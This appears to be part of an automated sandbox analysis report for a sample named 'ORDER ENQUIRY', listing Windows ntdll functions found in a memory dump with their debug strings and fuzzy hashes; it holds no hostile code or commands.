SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B224C0
@, xrefs: 01B2259B
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B22412
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B22602
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B222E4
RtlpResolveAssemblyStorageMapEntry, xrefs: 01B2261F
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B22624
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B22498
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B22506
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B22409
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B225EB

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 50ae7d04bf3adf37081695f30500e35bbbc019dc20ba0cd6c57a3204c34b1c6c
Instruction ID: 84dfca48ae304f06bdc26687896972f9ec178eda957ea46a0714099b70197fb4
Opcode Fuzzy Hash: 50ae7d04bf3adf37081695f30500e35bbbc019dc20ba0cd6c57a3204c34b1c6c
Instruction Fuzzy Hash: 74027FF1D002299BDB35DB54CD84BAAB7B8AF54304F4441DAE70DA7241DB309E98CF69

Function 01B58B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

csrss.exe, xrefs: 01B58B80
heapType, xrefs: 01B58BCB
runtimebroker.exe, xrefs: 01B58B73
smss.exe, xrefs: 01B58B8B
DefaultBrowser_NOPUBLISHERID, xrefs: 01B58D00
lsass.exe, xrefs: 01B58BA1
services.exe, xrefs: 01B58B96
svchost.exe, xrefs: 01B58B68
SegmentHeap, xrefs: 01B58BE9
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01B58BD0

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 620a987057407e7d129268f9010985e6604f47d844f3b0aeaa755a571b7e79f1
Instruction ID: d518d478a49a2db48b77fe84cce2bb5907f080492001ef4c1ab78992bb24b833
Opcode Fuzzy Hash: 620a987057407e7d129268f9010985e6604f47d844f3b0aeaa755a571b7e79f1
Instruction Fuzzy Hash: 4B51F0715143019BD36ADF5A8984BABBBECFF94640F240A5DFE99C3280E770D644CB92

Function 01B60274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01B604D3
Just reallocated block at %p to %Ix bytes, xrefs: 01B605F1
About to reallocate block at %p to %Ix bytes, xrefs: 01B603BA
HEAP[%wZ]: , xrefs: 01B60399, 01B604A8, 01B605D0, 01B60675, 01B606CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01B606EA
RtlReAllocateHeap, xrefs: 01B602BF, 01B60362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01B6069F
HEAP: , xrefs: 01B603A6, 01B604B5, 01B605DD, 01B60682, 01B606D9

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: d8ff78b67826fe78a7f35f0db725fd33a6c9c2ed11703d1ab96b007368fd511e
Instruction ID: 0265cd7486247a2152f62e8cc74f61ea8c132ff29032e3f5b653fdac92c3ece5
Opcode Fuzzy Hash: d8ff78b67826fe78a7f35f0db725fd33a6c9c2ed11703d1ab96b007368fd511e
Instruction Fuzzy Hash: 06D11531500686EFDB2AEF6AC441AAEBFF5FF69700F488099F4459B252D778D981CB10

Function 01B389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierFlags, xrefs: 01B38C50
AVRF: -*- final list of providers -*- , xrefs: 01B38B8F
VerifierDlls, xrefs: 01B38CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B38A67
VerifierDebug, xrefs: 01B38CA5
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B38A3D
HandleTraces, xrefs: 01B38C8F

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 79d4faddbfd152349b75189b04c74ed829848d36b2356cb6a18eb284534c44c1
Instruction ID: 34a83bab09e5b6e7d08d43d4aceedb4e1633cce2aa849bbb424dcb7761277f42
Opcode Fuzzy Hash: 79d4faddbfd152349b75189b04c74ed829848d36b2356cb6a18eb284534c44c1
Instruction Fuzzy Hash: F59166B2644706AFDB39DF28C981B5BB7E4EBC4714F84069CFA41AB240D770AD21C792

Function 01ABEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 01ABEB62
, xrefs: 01ABF299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 01ABEB58
{, xrefs: 01B14643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 01ABEB6C
T, xrefs: 01ABEB4E

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 649592f98763dab7c4dcfe41883b96b9f3d09a76ea893226f5f281ba38ee17fb
Instruction ID: 19fcfdd4287a9ca16befa4961e6c144986fd120bc95a434b3d18c371a8ed737e
Opcode Fuzzy Hash: 649592f98763dab7c4dcfe41883b96b9f3d09a76ea893226f5f281ba38ee17fb
Instruction Fuzzy Hash: 6EA24774A0566A8FDB68CF18CD887E9BBB9EF45304F5942E9D90DA7255DB309E80CF00

Function 01AE63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01B241FE
minkernel\ntdll\ldrinit.c, xrefs: 01B240E9, 01B2414B, 01B2420F, 01B24269
_LdrpInitialize, xrefs: 01B240DF, 01B24141, 01B24205, 01B2425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01B240D8
Delaying execution failed with status 0x%08lx, xrefs: 01B24258
Process initialization failed with status 0x%08lx, xrefs: 01B2413A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 44baf4288e77f99ac86e6da32e6ec9054f345378deec8e498f79a8da390c2f2b
Instruction ID: bcbe62a862b59d2180bc07a6af0a61024f2788692451a125eeb1106942d43ac4
Opcode Fuzzy Hash: 44baf4288e77f99ac86e6da32e6ec9054f345378deec8e498f79a8da390c2f2b
Instruction Fuzzy Hash: B4918970B00325ABEB39DF19D949BAA7FE1FF11B14F5800ADE9086B682D7709845C7D0

Function 01AA645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01B09A11, 01B09A3A
apphelp.dll, xrefs: 01AA6496
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B099ED
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B09A01
LdrpInitShimEngine, xrefs: 01B099F4, 01B09A07, 01B09A30
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B09A2A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 1bbe356f06e2ef1a05f7ac9ffda2ea42a0d8fcb32be82480f75e268a1caf5ba0
Instruction ID: 24c7db9204d289df548f50240af77ca20acf3abe013093653f5e6cee72ef500c
Opcode Fuzzy Hash: 1bbe356f06e2ef1a05f7ac9ffda2ea42a0d8fcb32be82480f75e268a1caf5ba0
Instruction Fuzzy Hash: 7B51B371208305AFEB25DF24D941FABBBE8FB84748F44491EF5899B1A1D730E944CB92

Function 01AEC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 01B281E5
minkernel\ntdll\ldrinit.c, xrefs: 01AEC6C3
minkernel\ntdll\ldrredirect.c, xrefs: 01B28181, 01B281F5
Loading import redirection DLL: '%wZ', xrefs: 01B28170
LdrpInitializeImportRedirection, xrefs: 01B28177, 01B281EB
LdrpInitializeProcess, xrefs: 01AEC6C4

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 761967bf86c728326a553c05c614d5e29e2b51b0eac8226c00d8b328a1ab7b5f
Instruction ID: d6ea6b91c88468d4e0da7252c19213ae1150195e4b4898ea1285a6b0926c0831
Opcode Fuzzy Hash: 761967bf86c728326a553c05c614d5e29e2b51b0eac8226c00d8b328a1ab7b5f
Instruction Fuzzy Hash: E7312571644716AFC724EF29D946E2BBBE4FF94B20F04055CF945AB295E720EC04CBA2

Function 01AE2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B22180
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B221BF
RtlGetAssemblyStorageRoot, xrefs: 01B22160, 01B2219A, 01B221BA
SXS: %s() passed the empty activation context, xrefs: 01B22165
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B2219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B22178

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 7101de2dfa77b1b245713e72faf86e4a8281bcf83ede24c4700a10b8a06915bc
Instruction ID: bdb50340630161b4b00d05b7931d022f43b41ecf46eadf3acfee9ccdf347bcbc
Opcode Fuzzy Hash: 7101de2dfa77b1b245713e72faf86e4a8281bcf83ede24c4700a10b8a06915bc
Instruction Fuzzy Hash: 44310836E4022577FB259A9ACC45F6B7AB8EB94B50F1540DAFA04FB140D3709A41C6A1

Function 01AF096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01AF2DF0: LdrInitializeThunk.NTDLL ref: 01AF2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0D74

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 21f0f7c654efcbdd83d2b963af6fe0265c8b3d5436e4652647175de66d904df3
Instruction ID: 028fa1b29acf9f133441dc162b84e955149a7c223fe182ca2ff29db4cba6d232
Opcode Fuzzy Hash: 21f0f7c654efcbdd83d2b963af6fe0265c8b3d5436e4652647175de66d904df3
Instruction Fuzzy Hash: 04423971900715DFDB25CF68C980BAAB7F5FF08314F1445AEEA899B242E770A985CF60

Function 01ABA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 01ABA3EF
LdrResFallbackLangList Exit, xrefs: 01ABA3FF
6, xrefs: 01ABA3F7
8, xrefs: 01ABA3E7

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: e40820eb91d08580b5c4028c83dbaed22996ab218712af37174be5e521c7598e
Instruction ID: 0ef1298a599107e25046501774e31ac52246586feabe5ecb92191fc0bc3c2c2c
Opcode Fuzzy Hash: e40820eb91d08580b5c4028c83dbaed22996ab218712af37174be5e521c7598e
Instruction Fuzzy Hash: 5BC18D74108386CFD715DF68C180BAAB7F8FF84704F0449AAF9958B252E738DA49CB56

Function 01AE8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01AE8421
@, xrefs: 01AE8591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AE855E
LdrpInitializeProcess, xrefs: 01AE8422

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: b62cea613e6cb236a2adca9645ecec36cc89b4359656b4d30595771084cb675b
Instruction ID: 10be1afcfa676e30c08e1580992b49a19d70360198f4269157a1102ddd6b86b9
Opcode Fuzzy Hash: b62cea613e6cb236a2adca9645ecec36cc89b4359656b4d30595771084cb675b
Instruction Fuzzy Hash: CC918A71508345AFD721EF65CD85FABBAE8FF88744F40096EFA8892151E738D904CB62

Function 01AE273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 01B221DE
.Local, xrefs: 01AE28D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B222B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B221D9, 01B222B1

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: a754534807a8f576ae5fa0843083c73598d2fa5deb663501d5377af6166da0ad
Instruction ID: 41b9cd38bbb41c9327448ff85951b3e54173b00204a8117903076585f0c2e16c
Opcode Fuzzy Hash: a754534807a8f576ae5fa0843083c73598d2fa5deb663501d5377af6166da0ad
Instruction Fuzzy Hash: E2A19031900229DBDB25CF68CC88BA9B7F5BF59354F1541EAE908EB251D7309E84CF90

Function 01AE4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B23437
RtlDeactivateActivationContext, xrefs: 01B23425, 01B23432, 01B23451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B2342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B23456

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: e97de25fb9e1b08841c232e65ee793f09f7bb0657fa08d70d60461230fb7c9a3
Instruction ID: 7f9e41056c95520034ac6a78322ff7cff7315979ce8684d9dcbc074bf7bfc9a2
Opcode Fuzzy Hash: e97de25fb9e1b08841c232e65ee793f09f7bb0657fa08d70d60461230fb7c9a3
Instruction Fuzzy Hash: A06135326007129BDB26CF1DC885B3AB7E9FF88B10F14859DE969DB250C738E845CB91

Function 01AB64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B1106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B10FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B11028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B110AE

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 6374e7927dba5e26128d20dee72a0c4bb6c5ed861385557965edcfe57177f9d0
Instruction ID: 3ce0c515ab8e9ca546556285542678ced423e0123467f3984cf8230ff6b18e71
Opcode Fuzzy Hash: 6374e7927dba5e26128d20dee72a0c4bb6c5ed861385557965edcfe57177f9d0
Instruction Fuzzy Hash: 6571CEB1904345AFCB21EF28C8C4B977FA8EF94764F440568F9498B18BD334D598CB92

Function 01AD245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01B1A9A2
apphelp.dll, xrefs: 01AD2462
LdrpDynamicShimModule, xrefs: 01B1A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B1A992

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: abf471a03c572d09c22b27ecf8e54ec199fbfe5af1722df12469e15d68119d4b
Instruction ID: 6c6f2e8e16a918f869c2d9f7cd69c2606f060f5154221c592dd193da3c6b6fa4
Opcode Fuzzy Hash: abf471a03c572d09c22b27ecf8e54ec199fbfe5af1722df12469e15d68119d4b
Instruction Fuzzy Hash: 3D3141B1600241ABDB359F6DD882FB9B7F5FB84710F9A405EF90167259C7706981CB40

Function 01AC29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01AC3255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AC327D
HEAP: , xrefs: 01AC3264

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 463e40be313ea153ba9de84b766dcc89f1dc1e4069fe845c6502ee8c82ba03b6
Instruction ID: ec4ae44faba70059080ff17738bda45aea2804fd4cd581a0db54e2cc66c323e5
Opcode Fuzzy Hash: 463e40be313ea153ba9de84b766dcc89f1dc1e4069fe845c6502ee8c82ba03b6
Instruction Fuzzy Hash: 8B92AA71A042499FDF25CF68C4407AEBBF1BF48B10F1880AEE959AB352D735A945CF50

Function 01AC0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01B150AE
(UCRBlock->Size >= *Size), xrefs: 01B150CA
HEAP: , xrefs: 01B150BD

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: bcd6c068826e00a225233e49a908c2cc9ab7418189744cee145192a75ed894c2
Instruction ID: 5777783f5f7543f0b918c74b946b6a8e9a2ab2d3ef3ae2e23773137608643e5f
Opcode Fuzzy Hash: bcd6c068826e00a225233e49a908c2cc9ab7418189744cee145192a75ed894c2
Instruction Fuzzy Hash: B8F1BE35A00606DFEB2ACF68C984BAAB7B5FF85700F1481ACE5169B355D734E981CB90

Function 01AD6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 01B1CA51
@, xrefs: 01AD6C24

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: de564b988bfa412e94048501793b17ec862cc9882c8e4a54167d0c8f36a3094d
Instruction ID: b976c7c883098c682a084e60de5978d97745066155d6555b6480483c0bb3baea
Opcode Fuzzy Hash: de564b988bfa412e94048501793b17ec862cc9882c8e4a54167d0c8f36a3094d
Instruction Fuzzy Hash: 03C2A1716087419FDB29CF68C881BABBBE5BF88718F05896DF98AC7241D734D844CB52

Function 01AAA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 01B0C2E6
\??\, xrefs: 01B0C1E4
UseFilter, xrefs: 01AAA1C1

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 47003fc05d46fb4610a797e292b7623a1b88de91403788f984f75953530a92c2
Instruction ID: a8651221d303d5a507afa2c1b61551b08fdda6f7135133402ceda4ba58795c85
Opcode Fuzzy Hash: 47003fc05d46fb4610a797e292b7623a1b88de91403788f984f75953530a92c2
Instruction Fuzzy Hash: A5A15E719116299BDF32DF64CD88BAABBB8FF44700F1141EAEA09A7250D7359E84CF50

Function 01AD0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01B1A121
Failed to allocated memory for shimmed module list, xrefs: 01B1A10F
LdrpCheckModule, xrefs: 01B1A117

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 94821d92897cf9b4e8f0a6248a257e6e7d76794929f861d8c1ed1b8cadde2e81
Instruction ID: 1e190f685f4efbdc24b38ce3cebdeb3f4cfee794fa8e13999357ce6bf76c2515
Opcode Fuzzy Hash: 94821d92897cf9b4e8f0a6248a257e6e7d76794929f861d8c1ed1b8cadde2e81
Instruction Fuzzy Hash: 6D71F1B0A00606DFDB29DF68CA85ABEB7F4FB48704F59406DE806E7255E734AD41CB40

Function 01AEC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01B282E8
Failed to reallocate the system dirs string !, xrefs: 01B282D7
LdrpInitializePerUserWindowsDirectory, xrefs: 01B282DE

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
